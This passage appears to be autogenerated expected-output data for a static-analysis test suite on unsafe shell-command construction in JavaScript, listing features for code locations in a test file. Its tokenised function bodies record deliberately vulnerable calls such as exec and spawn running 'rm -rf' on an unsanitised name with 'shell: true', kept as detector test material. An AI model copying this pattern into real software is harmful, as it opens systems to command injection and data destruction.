WN_OPT) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:8:424:11 | "rm" | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:8:424:11 | "rm" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:8:424:11 | "rm" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:8:424:11 | "rm" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:8:424:11 | "rm" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:8:424:11 | "rm" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:8:424:11 | "rm" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:8:424:11 | "rm" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:14:424:28 | ["first", name] | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:14:424:28 | ["first", name] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:14:424:28 | ["first", name] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:14:424:28 | ["first", name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:14:424:28 | ["first", name] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:14:424:28 | ["first", name] | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:14:424:28 | ["first", name] | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:14:424:28 | ["first", name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:15:424:21 | "first" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:24:424:27 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:31:424:39 | SPAWN_OPT | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:31:424:39 | SPAWN_OPT | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:31:424:39 | SPAWN_OPT | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:31:424:39 | SPAWN_OPT | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:31:424:39 | SPAWN_OPT | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:31:424:39 | SPAWN_OPT | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:31:424:39 | SPAWN_OPT | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:31:424:39 | SPAWN_OPT | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:8 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:8 | arr | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:8 | arr | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:8 | arr | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:8 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr = [] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr = [] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr = [] | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr = [] | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:6:425:13 | arr = [] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:12:425:13 | [] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:12:425:13 | [] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:12:425:13 | [] | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:12:425:13 | [] | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:425:12:425:13 | [] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:4 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:4 | arr | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:4 | arr | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:4 | arr | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:4 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:9 | arr.push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:9 | arr.push | contextSurroundingFunctionParameters | (name) | +| 